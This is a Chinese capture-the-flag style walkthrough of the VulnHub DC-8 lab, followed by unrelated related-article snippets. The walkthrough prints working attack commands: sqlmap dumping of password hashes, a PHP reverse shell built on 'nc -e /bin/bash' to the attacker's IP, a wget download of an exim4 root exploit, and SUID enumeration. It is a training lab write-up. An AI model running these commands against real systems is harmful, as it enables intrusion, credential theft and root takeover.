靶場練習第十六天~vulnhub靶場之dc-8

一、準備工作

kali和靶機都選擇NAT模式(kali與靶機同網段)

1.靶場環境

下載鏈接:https://download.vulnhub.com/dc/DC-8.zip

2.kali的ip

命令:ifconfig

3.靶機的ip

掃描靶機ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)掃描靶機開放的端口及其服務

nmap -A -p- 192.168.101.121

2.網站的信息收集

(1)靶機開放了80端口,先訪問靶機網站看看有什么有用的信息

?

三、漏洞發現及其利用

(1)sql注入

1.使用sqlmap

sqlmap -u http://192.168.101.121?nid=1 -current-db -batch #獲取當前數據庫

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -tables -batch # 獲取表名

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -T users -columns -batch #獲取字段名

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -T users -C name,pass -dump #獲取賬號密碼

獲取當前數據庫

獲取表名user

獲取字段名name、pass

獲取賬號密碼

2.john解碼

創建一個文本將剛才獲取到的密碼放到里面,通過john解碼

vi pass

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

:wq

cat pass

john pass

只得出一個turtle密碼,不知道是admin還是john,都試一下

最后只能是john

登錄成功

(2)反彈getshell

1.添加getshell

發現觀察頁面,發現Concat Us可以修改內容,到web寫一個php反彈shell

點擊form settins進行編寫getshell的語句

dsasffafgssgss

<?php

system('nc -e /bin/bash 192.168.101.10 1234');

?>

頁面最后面有一個save configuration,點擊它保存


2.反彈shell

(1)在kali這邊開啟監聽

nc -lvvp 1234

(2)回到剛才登錄到頁面,隨便提交點東西

(3)回到kali,發現已經監聽成功

(4)優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行)

python -c 'import pty;pty.spawn("/bin/bash")'

(3)提權

1.查找具有suid權限的命令,發現可疑命令exim4,百度一下,exim是一款在Unix系統上使用的郵件服務,exim4在使用時具有root權限

find / -user root -perm -4000 -print 2>/dev/null

2.查看exim版本

/usr/sbin/exim4 --version

3.使用searchsploit工具查找exim版本腳本信息

searchsploit exim

4.將攻擊代碼下載到當前目錄并使用dos2unix修改格式為unix,避免后面需要在腳本中再操作,或者在靶機上修改腳本內容(在文件內容終端輸入:set ff=unix,使windows代碼能在Unix上執行)

apt install dos2unix

cd /home

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home

dos2unix 46996.sh

5.在kali開啟一個Http服務

python -m SimpleHTTPServer

6.在靶機上將46996.sh腳本文件下載在靶機本地并提升權限

cd /tmp

wget http://192.168.101.10:8000/46996.sh

chmod 777 46996.sh

7.啟動腳本進行提權

./46996.sh -m netcat

8.找到flag

cat /root/flag.txt

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375036.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375036.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375036.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【SpringMVC】SpringMVC系列4之@RequestParam 映射請求參數值

4、RequestParam 映射請求參數值 4.1、概述 Spring MVC 通過分析處理方法的簽名&#xff0c;將 HTTP 請求信息綁定到處理方法的相應人參中。Spring MVC 對控制器處理方法簽名的限制是很寬松的&#xff0c;幾乎可以按喜歡的任何方式對方法進行簽名。必要時可以對方法及方法入…

Sprint3

進展&#xff1a;今天主要是各自熟悉安卓應用開發平臺&#xff0c;設計了圖標&#xff0c;沒什么實際上的進展。 燃盡圖&#xff1a; 團隊工作照&#xff1a; 轉載于:https://www.cnblogs.com/XJXYJ/p/4495810.html

靶場練習第十七天~vulnhub靶場之dc-9

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&am…

Linux內核分析 02

二&#xff0c;操作系統是如何工作的 1、函數調用堆棧 三大法寶&#xff1a;存儲程序計算機 函數調用堆棧 中斷機制 堆棧&#xff1a;是C語言程序運行時必須的一個記錄調用路徑和參數的空間。是計算機內部現成的東西&#xff0c;我們直接使用。 包括函數調用框架、傳遞參數、保…

一 UI基本的用法

1. UIView的基本用法 //打印屏幕的寬和高CGRect screenBounds [[UIScreen mainScreen] bounds];NSLog("%f, %f", screenBounds.size.width, screenBounds.size.height);//創建一個UIView//UIView表示一個矩形區域UIView *v1 [[UIView alloc] init];//1.確定大小CGR…

靶場練習第十八天~vulnhub靶場之hackableII

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開…

Object-c基礎(2)

類和對象 類 在Object-c中類&#xff0c;其接口&#xff08;interface&#xff09;和實現&#xff08;implementation&#xff09;是分離開來的 類的聲明 interface 類名:父類名{實例變量的定義;}方法聲明;...end類的實現 implementation 類名方法定義...end對象 一個類提供…

arm linux 下移植busybox 的tftp

&#xff08;1&#xff09;進入busybox目錄&#xff0c;make menuconfig &#xff0c;然后在networking中勾選tftp項跟tftpd項。 &#xff08;2&#xff09;配置/etc/inetd.conf 中關于tftp的選項&#xff08;此部未驗證&#xff0c;不需要應該也可以&#xff09; tftp dgra…

靶場練習第二十天~vulnhub靶場之Funbox: Scriptkiddie

一、環境搭建 靶官網機下載地址&#xff1a;Funbox: Scriptkiddie ~ VulnHub 百度云盤下載鏈接: 百度網盤 請輸入提取碼 提取碼: i4a9 二、信息收集 1.nmap命令掃描靶機 先用ifconfig查看kali的IP&#xff0c;因為kali和靶機都是NAT模式下&#xff0c;所以用 nmap 192.168…

documentbodyscrollTop的值總為零的解決辦法

有一個功能需要判斷返回頂部按鈕是否顯示。 JS代碼如下&#xff1a; var sTop document.body.scrollTop;if(sTop>100){document.getElementById("sm_top").style.display"block";}else{document.getElementById("sm_top").style.display&quo…

spring mvc 多線程并發

ThreadLocal為解決多線程程序的并發問題提供了一種新的思路。使用這個工具類可以很簡潔地編寫出優美的多線程程序。 http://www.xuebuyuan.com/1628190.html 我們知道Spring通過各種DAO模板類降低了開發者使用各種數據持久技術的難度。這些模板類都是線程安全的&#xff0c;也就…

靶場練習第十九天~vulnhub靶場之GreenOptic: 1

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開…

靶場練習第二十五天~vulnhub靶場之Raven-2

一、準備工作 kali和靶機都選擇NAT模式&#xff08;kali與靶機同網段&#xff09; 1.靶場環境 下載鏈接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;掃描靶機開放的…

每天一個linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics&#xff08;虛擬內存統計&#xff09;的縮寫&#xff0c;可對操作系統的虛擬內存、進程、CPU活動進行監控。他是對系統的整體情況進行統計&#xff0c;不足之處是無法對某個進程進行深入分析。vmstat 工具提供了一種低開銷的系統性能觀察方…

用TypeScript開發了一個網頁游戲引擎,開放源代碼

最開始學習電腦編程的原動力之一就是想自己編寫游戲&#xff0c;一方面很好奇這些游戲是怎么做出來的&#xff0c;另一方面覺得有些地方設計的不合理&#xff0c;希望電腦游戲既能讓人玩的有趣&#xff0c;又不浪費時間。 學校五年&#xff0c;畢業十年&#xff0c;學用了十多種…

靶場練習第二十一天~vulnhub靶場之Momentum-1

一、環境搭建 1.ifconfig查看kali的ip 2.創建靶機 靶機下載地址&#xff1a;Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 尋找靶機ip&#xff1a;nmap 192.168.101.0/24 2.端口掃描 使用命令&#xff1a;nmap -A -T4 -p 1-65535 192.168.101.113&#xff0c;發現開放2…

為集合排序的三個方法

// 為集合字符串排序&#xff08;cmpare:&#xff09; // - null &#xff1a;空類型 就是字符型的0&#xff1b; // - [NSNull null]是對象類型&#xff0c;能夠存入集合的數據&#xff1a;為其分配了內存&#xff0c;但其中的值為空&#xff08;不能被排序否則程序會崩潰&am…

C#ArrayList對象集合

ArrayList alist new ArrayList();//集合對像 長度可以改變&#xff0c;類型不限//添加單個元素可以Add()alist.Add("在在的");alist.Add(35);alist.Add(3.14);alist.Add(c);alist.Add(5000m);//如果用Add()添加數組或集合最好用 alist.AddRange()alist.AddRange(…

靶場練習第二十二天~vulnhub靶場之Momentum-2

一、準備工作 靶機下載地址&#xff1a;Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看開放的端口和協議&#xff1a;nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster&#xff0c;尋找隱藏的網站 gobuster di…

索引深入淺出(8/10):覆蓋索引或列包含

在索引深入淺出&#xff1a;非聚集索引的B樹結構在聚集表里&#xff0c;在聚集表里&#xff0c;我們看到非聚集索引的葉子層只包含非聚集索引鍵和聚集索引鍵。從聚集表結構或堆表結構里拿到剩下列&#xff0c;SQL Server需要進行書簽/鍵查找操作。很多情況下書簽或鍵查找非常消…